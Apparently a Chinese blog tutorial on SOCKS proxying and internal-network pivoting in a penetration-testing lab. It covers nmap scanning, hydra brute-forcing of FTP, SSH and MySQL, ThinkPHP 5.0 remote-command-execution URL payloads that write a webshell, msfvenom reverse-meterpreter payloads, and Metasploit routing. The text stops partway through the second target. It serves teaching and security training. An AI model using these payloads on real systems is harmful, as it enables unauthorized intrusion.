socks代理实战

文章目录

  • Socks代理实战
    • Socks代理简介
    • Socks代理工具
    • Socks代理实战-MSF
      • 渗透场景
      • Target1
      • Target2
      • Target3
    • Socks代理实战-FRP
      • Target1
      • Target2
      • Target3
    • Socks代理实战-EW
      • EW使用简介
      • EW正反向Socks代理
      • EW创建一层Socks代理
      • 二级级联本地Socks
      • EW创建二层Socks代理
      • 三级级联的本地Socks
      • EW创建三层Socks代理

Socks代理实战

Socks代理简介

  • 什么是socks

SOCKS是一种网络传输协议,主要用于客户端与外网服务器之间通讯的中间传递。

根据OSI模型,SOCKS是会话层的协议,位于表示层与传输层之间。

使用TCP协议传输数据,因而不提供如传递 ICMP 信息之类的网络层网关服务。

socks代理实战_第1张图片

osi参考模型:https://www.cnblogs.com/qishui/p/5428938.html

现今大多组织的网络架构,利用网络防火墙将组织内部的网络结构与外部网络如 Internet 有效地隔离开来。这些防火墙系统通常以应用层网关的形式工作在网络之间,提供受控的 TELNET、FTP、SMTP等的接入。

而SOCKS则提供一个通用框架来使这些协议安全透明地穿过防火墙。

  • 什么是socks代理
  1. 被代理端与代理服务器通过SOCKS4/5代理协议进行通讯;
  2. SOCKS4是对HTTP代理协议的加强,它不仅代理HTTP协议,而是对所有向外的连接进行代理,没有协议限制;
  3. SOCKS5对前一版本做了进一步扩展,增加了支持UDP代理和身份验证功能;
  4. SOCKS5采用地址解析方案 (addressing scheme) 以支持域名和 IPV6 地址解析。

使用Socks代理:

  1. SOCKS服务器的IP地址
  2. SOCKS服务所在端口
  3. SOCKS服务是否需要身份验证

Socks代理工具

  • EarthWorm

http://rootkiter.com/EarthWorm/

EW 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设
和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。

  • FRP

https://github.com/fatedier/frp

frp 是一个可用于内网穿透的高性能的反向代理应用

  • ProxyChains

http://proxychains.sourceforge.net/

关于ProxyChains工具:

  1. 它是一个代理工具。
  2. 最新版本:3.1
  3. 专用OS:Linux和其他Unices。
  4. 允许TCP和DNS通过代理隧道。
  5. 支持HTTP、SOCKS4和SOCKS5代理服务器。
  6. 不同的代理类型可以混合在同一链中。
  7. 代理链:用户定义的代理链列表。

可用性:

  1. 通过代理服务器运行任何程序。
  2. 从限制性防火墙后面访问互联网。
  3. 隐藏你的IP
  4. 通过代理服务器运行SSH、telnet、wget、ftp、apt、vnc、nmap。
    5, 从外部通过反向代理访问内联网(192.168../10..)。
  • Other
reDuh:https://github.com/sensepost/reDuh
reGeorg:https://github.com/sensepost/reGeorg
sSocks:https://sourceforge.net/projects/ssocks/
SocksCap64:http://www.sockscap64.com
Proxifier:https://www.proxifier.com/

Socks代理实战-MSF

渗透场景

socks代理实战_第2张图片

Target1

  • 信息收集
nmap -A -T4 -p- --script vuln 192.168.78.66

开放端口:21/22/80/111/888/3306/8888
操作系统:Linux

socks代理实战_第3张图片

  • 分析利用
21 / 22端口:弱口令爆破
hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.1.195 ftp
hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.1.195 ssh

3306端口:不允许远程IP连接

8888端口:宝塔登录页面

80端口:Thinkphp v5.0

存在远程命令执行漏洞,通过命令执行写入一句话,可GetShell。

/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=
  • 主机信息收集
ifconfig:发现存在192.168.22.0/24的内网网段。

探测此网段存活主机,发现存活主机 192.168.22.22

socks代理实战_第4张图片

socks代理实战_第5张图片

socks代理实战_第6张图片

#!/bin/bash
for num in {1..254};
 do
  ip=192.168.22.$num
  ping -c1 $ip >/dev/null 2>&1
  if [ $? = 0 ];
  then
   echo "$ip" Ok
  else
   echo "$ip" No
  fi
 done
@echo off
chcp 65001>nul
echo 正在扫描。。。。。。
for /L %%P in (1,1,254) do @ping -w 10 -n 1 192.168.78.%%P | findstr TTL= >>ip.txt
echo 扫描结束,按任意键结束窗口!
pause>nul
  • 建立Socks代理
  1. 反弹target1的shell到msf
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.78.117 lport=6666 R > mingy.php

msfvenom -p  linux/x64/meterpreter_reverse_tcp lhost=192.168.78.117 lport=6667 -f elf > mingy.elf
  1. 上传到target1的tmp目录下
chmod 777 mingy.elf
./mingy.elf
  1. 获得target1的meterpreter shell后,添加到192.168.22网段的路由
run autoroute -s 192.168.22.0/24
run autoroute -p
  1. 使用msf的socks5模块建立socks服务,并配置proxychains代理
msf5 > use auxiliary/server/socks5
msf5 auxiliary(server/socks5) > run
vim /etc/proxychains.conf

socks5 127.0.0.1 1080

Target2

  • 信息收集
proxychains nmap -sT -Pn -p- -n -T4 192.168.22.22

开放端口:21/22/80/3306/8888
操作系统:linux

socks代理实战_第7张图片

  • 分析利用
21 / 22 / 3306端口:弱口令爆破
proxychains hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.22.22 ftp
proxychains hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.22.22 ssh
proxychains hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.22.22 mysql

8888端口:宝塔登录页面

80端口:bagecms(sql注入,任意文件编辑漏洞)

proxychains curl 192.168.22.22


                    

你可能感兴趣的:(初学者常见问题)